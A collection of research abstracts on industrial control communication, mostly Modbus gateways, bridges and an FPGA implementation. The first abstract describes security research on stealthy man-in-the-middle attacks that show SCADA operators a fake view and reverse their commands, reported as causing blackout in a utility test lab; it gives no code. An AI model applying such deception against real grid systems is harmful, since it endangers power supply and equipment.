Stealthy Deception Attacks Against SCADA Systems

SCADA protocols for Industrial Control Systems (ICS) are vulnerable to network attacks such as session hijacking. Hence, research focuses on network anomaly detection based on meta--data (message sizes, timing, command sequence), or on the state values of the physical process. In this work we present a class of semantic network-based attacks against SCADA systems that are undetectable by the above mentioned anomaly detection. After hijacking the communication channels between the Human Machine Interface (HMI) and Programmable Logic Controllers (PLCs), our attacks cause the HMI to present a fake view of the industrial process, deceiving the human operator into taking manual actions. Our most advanced attack also manipulates the messages generated by the operator's actions, reversing their semantic meaning while causing the HMI to present a view that is consistent with the attempted human actions. The attacks are totaly stealthy because the message sizes and timing, the command sequences, and the data values of the ICS's state all remain legitimate. We implemented and tested several attack scenarios in the test lab of our local electric company, against a real HMI and real PLCs, separated by a commercial-grade firewall. We developed a real-time security assessment tool, that can simultaneously manipulate the communication to multiple PLCs and cause the HMI to display a coherent system--wide fake view. Our tool is configured with message-manipulating rules written in an ICS Attack Markup Language (IAML) we designed, which may be of independent interest. Our semantic attacks all successfully fooled the operator and brought the system to states of blackout and possible equipment damage

Interfacing Modbus Plus to EPICS for KEKB Accelerator Control System

The KEKB Accelerator control system[1] is based on EPICS(Experimental Physics and Industrial Control System)[2] and uses many PLCs in the magnet protec-tion systems and the radiation safety system. In order to monitor the interlock status, Modbus Plus[3] is adopted as the protocol between an IOC(Input/Output Controller) and PLCs. For this purpose, a device support and a driver support for Modbus Plus have been developed. The device/driver support modules allow an IOC to communicate with PLC-s by asynchronous I/O transactions, in such a manner that the GPIB devices do. With the software modules, an IOC works always as a master device on the Modbus Plus net-work to read the status of controlled devices from PLC memory. While the main use of the software is to read the interlock status, it is also used to reset the interlock sys-tems. Details of the software structure are described. An ap-plication of this software in the KEKB accelerator control system is also presented.

A Review of Communication Protocols for Intelligent Remote Terminal Unit Development

This paper reviewed all the possible interfacing communication protocols for remote terminal unit (RTU). Supervisory Control and Data Acquisition (SCADA) system is a central station that can communicate with other network using the protocol. Fundamentally, the architectures of all networks are based on the seven layers of open system interconnection (OSI) and International Standard Organization (ISO). The objective of designing the protocols is to check the status of all the input and output field devices and send the report according to that status. The corresponding protocol and communication parameters between the connecting devices will be included in designing a complex SCADA system. The available protocols to develop the communication of RTU are Modbus/ASCII, distributed network protocol (DNP3), controller area network (CAN), International Electro-technical Commission (IEC 60870), and transmission control protocol/internet protocol (TCP/IP)

Controller Area Network to Modbus network bridge to interface gas detection units with Building Management Systems

Building Management Systems (BMS') are computer systems designed to control systems inside buildings or other facilities. While BMS' are common, there is no one size fits all approach. Controller Area Network (CAN) is a communication protocol sometimes used within BMS'. Modbus is a very common industrial communications protocol. The two protocols are not directly compatible and need to be 'bridged’ to communicate with each other. Gas Detection Australia (GDA) design and manufacture gas detection equipment. They have a current and ongoing need to interface Modbus enabled equipment with CAN enabled equipment in client BMS'. This project is sponsored with the aim of producing a network bridge to translate between the two protocols. The specific Modbus variation implemented is Modbus ASCII master. The design was based around the PIC 18F87K22 microprocessor. This was chosen to remain consistent with other GDA products. The communication interfaces were designed using integrated circuits that closely mimic the software development tools. This was a deliberate choice made to make software development simpler and to make it easier to translate source code to the finished product. A testing method was also created to allow the assessment of bridge performance. Testing demonstrated proof of concept using the development board. Separate testing of RS-485 hardware suggests that the full hardware specification is valid. Stress tests were carried out and determined that the bridge could be expected to be capable of responding to four CAN messages per second. The testing was limited by issues relating to the inconsistent operation of the CAN interface

Design and Application of Communication Gateway of EPA and MODBUS on Electric Power System

AbstractThrough the research of EPA Industrial Ethernet technology, MODBUS fieldbus technology, ARM embedded system and μC/OS-II real-time operating system, this paper discusses how to design and develop communication gateway of EPA and MODBUS. The communication gateway can realize bidirectional data transceiving on EPA protocol and MODBUS protocol. The communication gateway can provide a stable, secure, real-time and flexible solution for process control of the power plant

Modbus RTU for Embedded Cyber Secure Inverter Controller

The Modbus communication protocol is a widely adopted communication standard in industrial control systems. This communication protocol is known for being reliable and straightforward to implement while being versatile in terms of its operating parameters while supporting multiple formats over various hardware infrastructures and architectures. Many intelligent devices such as Programmable Logic Controllers (PLCs), Human-Machine Interfaces (HMIs), Internet-of-Things (IoT), and various Operational Technologies (OT) utilize Modbus for their communication systems. These types of systems must communicate with each other through a standardized and central communication process. To support the integration of these modular systems, a Field-Programmable Gate Array (FPGA) can act as an embedded central routing fabric for this communication to take place. Embedded systems are versatile enough to interface with various devices and systems to accomplish various goals. Additionally, embedded systems require relatively small physical designs to minimize the required resources to facilitate the intended application by providing low-level system access. This minimization of system resources goes hand in hand with reducing the financial cost of a proposed solution or system. As remotely collaborating researchers often use FPGAs to prototype designs that are required to have a method for data transmission among systems, it is imperative to provide a baseline standard for communications among devices and systems. A typical method of implementing the Modbus RTU communication protocol in an embedded environment is using integrated logic architectures within the FPGA called “Intellectual Property (IP) cores.” IP cores can be designed using integrated logic or circuit designs to function as an embedded processor. These IP cores can then perform the required computational actions to support the Modbus RTU communication protocol by utilizing high-level programming languages such as the C programming language. The hardware description language of Very High-Speed Integrated Circuit Hardware Description Language (VHDL) allows for the control of real hardware at the logic gate and signal level. These logic gates and signals can be designed and controlled to perform desired actions based on the system design. Programming an FPGA using VHDL allows an individual to access the lowest abstraction level of the system during FPGA development. This level of abstraction is referred to as the register-transfer level (RTL), which gives access to manipulating values and variables at the register level. This register-level manipulation provides precision over creating the logical circuit within the FPGA, thus minimizing the required code to perform desired operations. The Modbus RTU communication protocol can be implemented within an FPGA using VHDL programming to establish a standardized and embedded serial communication pathway. This implementation provides a standardized communication protocol to streamline research efforts among researchers, thus increasing the efficiency of research efforts. Additionally, this Modbus RTU implementation requires fewer resources when compared to typical communication protocol implementations that utilize an IP core, reducing the hardware requirement for effective research efforts